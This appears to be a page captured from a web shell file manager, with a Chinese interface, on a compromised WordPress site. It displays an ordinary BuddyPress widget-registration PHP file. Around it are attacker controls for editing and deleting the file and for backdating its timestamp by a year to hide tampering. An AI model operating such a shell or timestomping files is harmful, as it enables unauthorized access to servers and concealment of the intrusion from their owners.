文件操作 - bp-blogs-widgets.php
返回文件管理
返回主菜单
删除本文件
文件: /var/www/vec.uaysen.cl/html/wp-content/plugins/buddypress/bp-blogs/bp-blogs-widgets.php
编辑文件内容
<?php /** * BuddyPress Blogs Widgets. * * @package BuddyPress * @subpackage BlogsWidgets * @since 1.0.0 */ // Exit if accessed directly. defined( 'ABSPATH' ) || exit; /** * Registers the Recent Posts Legacy Widget. * * @since 10.0.0 */ function bp_blogs_register_recent_posts_widget() { register_widget( 'BP_Blogs_Recent_Posts_Widget' ); } /** * Register the widgets for the Blogs component. */ function bp_blogs_register_widgets() { global $wpdb; if ( bp_is_active( 'activity' ) && bp_is_root_blog( $wpdb->blogid ) ) { add_action( 'widgets_init', 'bp_blogs_register_recent_posts_widget' ); } } add_action( 'bp_register_widgets', 'bp_blogs_register_widgets' );
修改文件时间
将文件时间修改为当前时间的前一年
删除文件